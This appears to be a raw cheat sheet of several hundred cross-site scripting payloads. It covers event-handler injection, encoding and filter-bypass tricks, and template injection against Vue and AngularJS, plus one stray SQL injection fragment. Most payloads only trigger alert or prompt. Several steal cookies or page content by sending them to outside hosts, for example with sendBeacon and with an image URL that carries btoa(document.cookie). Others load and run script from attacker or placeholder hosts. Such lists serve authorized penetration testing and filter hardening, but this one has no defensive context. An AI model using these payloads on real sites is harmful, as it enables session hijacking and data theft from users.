<input oninput=alert(1) value=xss>
<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
<a onpaste="alert(1)" contenteditable>test</a>
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%3Cimg%20src=xx%20onerror=alert(1)%3E
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{}</style><xss style="animation-name:x"
onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-
name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x"
onanimationstart="alert(1)"></xss>
<body onbeforeprint=console.log(1)>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4"
type="video/mp4"></video>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>
<a id=x tabindex=1 onfocus=alert(1)></a>
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<address id=x tabindex=1 onfocus=alert(1)></address>
<applet id=x tabindex=1 onfocus=alert(1)></applet>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<button autofocus onfocus=alert(1)>test</button>
<data id=x tabindex=1 onfocus=alert(1)></data>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<form id=x tabindex=1 onfocus=alert(1)></form>
<frameset><frame id=x onfocus=alert(1)>
<head id=x tabindex=1 onfocus=alert(1) style=display:block></head>
<img id=x tabindex=1 onfocus=alert(1)></img>
<image id=x tabindex=1 onfocus=alert(1)></image>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav"
type="audio/wav"></audio>
<body onmessage=print()>
<body onresize="print()">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<details ontoggle=alert(1) open>test</details>
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
<body onpageshow=alert(1)>
<body onpopstate=print()>
<audio controls onprogress=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px
dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><
br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><span id=x>test</span></xss>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
<style><img title="</style><img src onerror=alert(1)>"></style>
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
<title><img title="</title><img src onerror=alert(1)>"></title>
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
{{_s.constructor('alert(1)')()}}
#{{_s.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x :[_b.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">
<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
\u003cimg src onerror=alert(1)\u003e
"><image/src/onerror=prompt("ibrahimxss")>
"><ImG%20sRc=x%20onErroR=prompt`ibrahimxss`>
';alert("ibrahimxss");//
“>-setTimeout`\u0028alert(1)\u0029`-’
</option><img src=x onerror=alert(origin)>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>xss</a>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
javascript:74163166147401571561541571411447514115414516216450615176
<img src=”invalid-image” onerror=”alert(document.cookie)”>
"><script>alert(1)</script>
"><img src=x onerror=alert(1)>
"><video src onerror=alert(1)>
"><audio src onerror=alert(1)>
"><svg/onload=alert(1)>
"><body/onload=alert(1)>
"><input/onfocus=alert(1)>
"><div onpointerover=alert(1)>
"><b onmouseover=alert(1)>hover
"{text:<img/src=x onload=confirm(1)>}"
{text:<img/src=x onload=confirm(1)>}
%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f
%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c
%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d
“autofocus onclick=’alert()
“autofocus onclick=’&#97;lert()’
ibrahimxss“autofocus onclick=’&#97;lert()’
<script type="text/javascript">javascript:alert(1);</script>
“><script>alert(1);</script>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/
onerror=import(location.search.split("aa=").pop());>
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
<svg@load=this.alert(1)>
<img src @error=this.alert(1)>
(Z("onerror="a=print,a`1`"))
(Z("onerror="a=console,a.log`${cookie}`"))
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
<img src @error=e=$event.composedPath().pop().alert(1)>
{{_toDisplayString.constructor('alert(1)')()}}
<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></
script>
<component is=script text=alert(1)>
<x v-bind:a='_b.constructor`alert(1)`()'>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
<img src @error=e=$event.path.pop().alert(1)>
{{_openBlock.constructor('alert(1)')()}}
#{{_openBlock.constructor('alert(1)')()}}
{{_Vue.h.constructor`alert(1)`()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor);}}
{{{}.")));alert(1)//"}}
{{!ready && (ready = true) && ( !call ? $
$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply =
constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' +
'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
{}.")));alert(1)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
xss'''><iframe srcdoc='%26it;script>;prompt` ${document.domain}`%26it;/script>'>
["');alert('xss');//"]@xyz.xxx
<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=
%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>
<svg/onload=location/**/='http://GH0ST.xss.ht/'+document.dom�
autofocus ' onfocus='alert(document.domain)'
"autofocus onfocus='alert(document.domain)'
"><svg+onload=alert&amp;#x00"1
"><svg+onload=alert&amp;#x01"1
"><svg+onload=alert&amp;#x02"1
"><svg+onload=alert&amp;#x03"1
"><svg+onload=alert&amp;#x04"1
"><svg+onload=alert&amp;#x05"1
"><svg+onload=alert&amp;#x06"1
"><svg+onload=alert&amp;#x07"1
"><svg+onload=alert&amp;#x08"1
"><svg+onload=alert&amp;#x09"1
"><svg+onload=alert&amp;#x95"1
"><svg+onload=alert&amp;#x96"1
"><svg+onload=alert&amp;#x97"1
"><svg+onload=alert&amp;#x98"1
"><svg+onload=alert&amp;#x99"1
"><svg+onload=alert&amp;#x107"1
"><svg+onload=alert&amp;#x9A"1
<x onxxx=alert(1) 1='
<input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)"
style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-
visibility:auto">
"><img src=x
onerror=prompt&#x000000028;document&#x00000002E;domain&#x000000029;&#x00000003B;>
<svg onload=setInterval(function()
{with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)”>’onload=”`<svg/1=’
">'-alert(1)-'<svg>
">alert(1)-"<svg>
‘-alert(1)-’<svg><!V
';alert(1);var myObj='
alert&#x28;1&#x29
");alert('xss');
')alert('xss');
‘;alert(/xss/)///
);alert(Xss);//
'); alert('XSS
\";;alert(';XSS';);//
“};alert(23);a={“a”:
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<event-source src=javascript:alert(1)>
<iMg onerror=alert(1) src=a>
<[%00]img onerror=alert(1) src=a>
<i[%00]mg onerror=alert(1) src=a>
<img[%09]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<img/’onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(1) src=a>
<img o[%00]nerror=alert(1) src=a>
<img onerror=a[%00]lert(1) src=a>
<img onerror=a&#x6c;ert(1) src=a>
<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29;>
<img onerror=a&#x06c;ert(1) src=a>
<img onerror=a&#x006c;ert(1) src=a>
<img onerror=a&#108;ert(1) src=a>
<img onerror=a&#108ert(1) src=a>
<img onerror=a&#0108ert(1) src=a>
<img onerror=eval(‘al&#x5c;u0065rt(1)’)src=a>
<imgonerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&
#x29;&#x27;&#x29; src=a
<embed src=javascript:alert(1)>
<img+border=3+alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/*+*/oNcliCk=alert()
+)////&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/
oNloAd=confirm('xssor')//&gt;\x3e>
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400
/><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<inpuT autofocus oNFocus="setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"onmouseover=alert(1)//
?alert(1)",
?alert(1)”,
"autofocus/onfocus=alert(1)//
'-alert(1)//
1"--></script><svg/onload=';alert(document.domain);'>
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String.
fromCharCode(88,83,83))//";alert(String.fromCharCode
(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\
><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/)
type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/
alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p"
onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*'
onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*'
onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//'
onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick=
alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*',
onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//'
onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";a
lert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
javascript:"/*'/*`/*\"
/*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/
onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*'
/*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg
onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></
template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
<script src=14.rs>
<input type="hidden" accesskey="X" onclick="alert(1)">
#"><img src=/ onerror=alert(2)>
-(confirm)(document.domain)//
; alert(1);//
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/
oNloAd=alert()//>\x3e
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<svg
onload=alert(1)>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
<svg><script href=data:,alert(1) />(
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<label id=x tabindex=1 onfocus=alert(1)></label>
<time onfocus=alert(1) autofocus tabindex=1>
<a2 onfocus=alert(1) autofocus tabindex=1>
<label onfocus=alert(1) autofocus tabindex=1>
<shadow onfocus=alert(1) autofocus tabindex=1>
<input autofocus onfocus=alert(1)>
<xss autofocus tabindex=1 onfocusin=alert(1)></xss>
<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
<input type=image src=1 onerror=alert(1)>
</a onmousemove=alert(1)>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<svg onload=alert%26%230000000040"1")>
%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)
1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e
%3Cscript%3Ealert(`xss`)%3C/script%3E
><BODy
onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\
u006d('+'document'+'.'+x1+c">
<svg>on%20onload%3D(“XSS”)(document.domain)<%2Fsvg>
<img src onerror=%26emsp;prompt`${document.domain}`>
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’])
dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi
javas%09cript:ghi=%27)%3E%27,you=%27(top%5B%22docum%22%2B%22ent%22%5D.cookie
%27;HTMLElement%5B%27inne%27%2B%27rHTML%27%5D=%27%3CSvg/OnLoad=alert%27%2Brob
%2Beco;//
"&gt;&lt;Svg Only=1
OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))&gt;
<=script>=alert("hacked")<=/scirpt>=
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;
&lt;dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt%2Ca(origin)%20x&gt;
&lt;dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x&gt;
&lt;img src=x onerror=alert(1)&gt;.crt
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt
&gt;+src+onerror=confirm&amp;lpar;1&amp;rpar;&lt;
"></textarea><ScRiPt>prompt(1)</ScRiPt// "><iframe/onload=alert(1)//
”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>
«input»; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};
«input»; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"};
'x'%2520onclick='confirm%601%60'
%0A%0d+select+user+from+dual+%0A%0D
%3Chtml%0aonmouseOver%0a=%0a(prompt)``//
image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/``
&lcub;&rcub;'>
?url="onm<>ouseover="ale<>rt(1)
document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') +
btoa(document.cookie) + '>')
window[document.body.innerText.charAt(document.body.innerText.indexOf('a'))+'lert']
(1)
<img src=something onauxclick="new Function `al\ert\`xss\``">
`payload´; %3Cimg src='null' onerror=alert('spyerror')%3E
<details onauxclick=confirm`xss`></details>
<style>@keyframes a{}b{animation:a;}</style> <b/onanimationstart=prompt`$
{document.domain}&#x60;>
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
/<svg%0Aonauxclick=0;[1].some(confirm)//
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']
['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
{` <body \< onscroll
=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,
101)))> ´}
<svg%0Aonauxclick=0;[1].some(confirm)//
(xss"><!--><svg/onload=alert(document.domain)>)
<form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62']
(`YWxlcnQoMSk7`));//
"<> au<>tof<>ocus o<>nfo<>cus=<>al<>ert<>(1<>)
" onauxclick=confirm`xss` "
<svg onauxclick='a=alert;b=document;a(b.domain)'>
%22onauxclick=alert`xss`+a
<xhzeem attr=" --- x="=='='onmouseover=confirm`xhzeem`
style="display:block;width:1000px;height:1000px;background:red"> --- ">
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)
<img%09'%0asrc='%5c%0d%7c'%00=''onerror=%0d%09%0a
%60%60.sup(eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==')))>
??"><img/src/onerror=alert(document.domain)>
<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
<sVg %00%00%00//onsite ONloAd=\u0061\u006C\u0065\u0072\u0074`/AmoloHT/`//>
parameter=<svg/&parameter=onload=alert()>
<svg onload=alert&#0000000040"1")>
“autofocus onFocUs=’find(l\u{6F}cati\
u{6F}n=`j&Tab;avascr&NewLine;ipt&colon;al&Tab;ert()`)’
<img src=a onerror="var
x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.a
ppendChild(x);">
</pre><!-%00-><svg/%0D%0A%0D%0A/Id="a"/TABindex="1"/onload="\u0061lert(1);">
<script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/
queries/js?callback=alert(1…)"></script>
%27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
"></tag><svg onload=alert(spyerror)>
<iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></
iframe>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
[" <style>@KeyFrames z{</style><div style=animation-name:z
onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript
%253Ealert('XSS')%253C%252Fscript%253E "</script> "]
<!<script>alert(1)</script> “
<details open ontoggle='self["ale"%2b"rt"]&lpar;document&period;domain&rpar;'>
<svg/onload=%26nbsp;alert`bohdan`+
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
</Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt>
</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>
/* <audio src=1 onloadstart=alert&lpar;1&rpar;//> */
<style>img{background-image:url('javascript:alert(1)')}</style>
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\
65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'>
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"
<details+/'on+/ontoggle=1^confirm(document.domain)+open//
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
"><sc<>ript><onxXxxXXxXXXxx=()%20autofoco%20onmouseover=alert("HEJAP ZAIRY AL-
SHARIF")></scr<>ipt>
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)
%27>
">\]<img src=x onerror=alert(document.cookie)>
"><svg%20onload=alert%26%230000000040"mysanismine")>
%00"><img src=x onerror=alert`1`//
<iframe+/ON+onload=%20alert(/str0d/)>
"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"
<h1/%6f%6e/oNclicK=alert``>XSS
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
<script>throw onerror=alert,'some string',123,'haha'</script>
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</
script>
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
<svg/%6f%6e/oNloaD=alert``>
<svg onpointerenter=jQuery.globalEval("al"+"ert(documen"+"t.cooki"+"e)");>
<img+src=x+on<!--ram-->error=ale<!--ram-->rt(1)>
"firstname":"<img src ='","lastname":"'onerror=print()>"
" on<embed>click="a=al<embed>ert,a(cookie)
%27%09);%0d%0a%09%09[1].find(alert)//
\"><svg%20onload=alert%26%230000000040\"1\")>
test",prompt%0A/*HelloWorld*/(document.domain)
/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select
JSON_OBJECT(1, current_user())))*/)
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript
%253ey6uu6
<ifram%0de src=jav%0dascript:alert(document.cookie)>
-setTimeout`prompt\u0028document.domain\u0029`-'
“><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
“><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/“^1//
"><input/onauxclick="[1].map(prompt)">
x" onerror=alert('Qusai") x="
x%22%20onerror%3Dalert%28%27Qusai%22%29%20x%3D%22
//*><ScRipt>alert(/XSS/)</ScriPT>
"/><body onpageshow-prompt`assassin`//
<sc%00ript/test='asdf'>alert/**/(1)</script>
%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E
%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT
%253E
<details open ontoggle="{alert`1`}"></details>
<j id=x style="-webkit-user-modify:read-write"
onfocus={window.onerror=eval}throw/0/+name>H</j>#x
1'"><img/src/onerror=.1|alert``>
a<%00meta name="i" HTTP-EQUIV="refresh" CONTENT="0;url=data:text/h
%00tml;base64,PHNjcmlwdD5hbGVydCgiT1BFTkJVR0JPVU5UWSIpOzwvc2NyaXB0Pg==">
">a<marquee
onstart='constructor.constructor(atob("ywxlcnqoj09qru5cvudct1vovfknkq"))()'></
marquee>
?"></script><base%20c%3D=href%3Dhttps:\targetsite>
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`$
{document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
%3balert`1`%3b
asd"`> onpointerenter=x=prompt,x`XSS`
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
<script>Object.prototype.BOOMR = 1;
>%0D%0A%0D%0A<x '=foo"><x foo='><img src=x
onerror=javascript:alert(`cloudfrontbypass`)//'>
>'><details/open/ontoggle=confirm('XSS')>
<input id=?a?value=?global?><input id=?b?value=?E?><input ?id=?c?value=?val?><input
id=?d?value=?aler?><input id=?e?value=?t(documen?><input id=?f?value=?t.domain)?
><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
?><img src=1 onmouseleave=print()>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23?000000028;document.domain)>
test?,prompt%0A/*HelloWorld*/(document.domain)
<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>
<a href=javas&#99;ript:alert(1)>
<img/src="x"/onerror="prom\u0070t&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;">
"><h2 id="Iamheading"onmouseover="confirm(1)">
<a x href=javascript%26%23x3A%3Bconfirm(1)>a</a>
%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527Click%2520ME
%2521%2527%2529%253C%252Fscript%253E
<sCRipT>alert(1)</sCRiPt>
<script>%0d%0aalert(1)</script>
<scr<script>ipt>alert(1);</scr</script>ipt>
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
<svg•onload=alert(1)>
</title><scRipt>alert(0x00C57D)</scRipt>
<iMg src%3dN onerror%3dalert(0x000D98)>
?><img src=x onmouseleave=print()>
><img src=x onmouseleave=print()>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></
object>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<style><img src="</style><img src=x "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
\u0065\u0076\u0061\u006C('ablolzers'['replace']("b","l")['replace']
("lolzers","ert"))`1`
s = '"><script>alert(1)</script>' print
'eval(String.fromCharCode('+",".join([str(ord(o)) for o in s])+'))'
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
eeee<%2fscript><script>prompt(/XSS/.source)<%2fscript>yyyy
sg7cx"%20onerror%3d"confirm(document.domain)"gd67e
src=x:alert(alt) alt=3117
<scronerror=ipt>prompt(document.domain)</scronerror=ipt>
window["ev".concat("al")](String.fromCharCode(97,108,101,114,116,40,49,41));
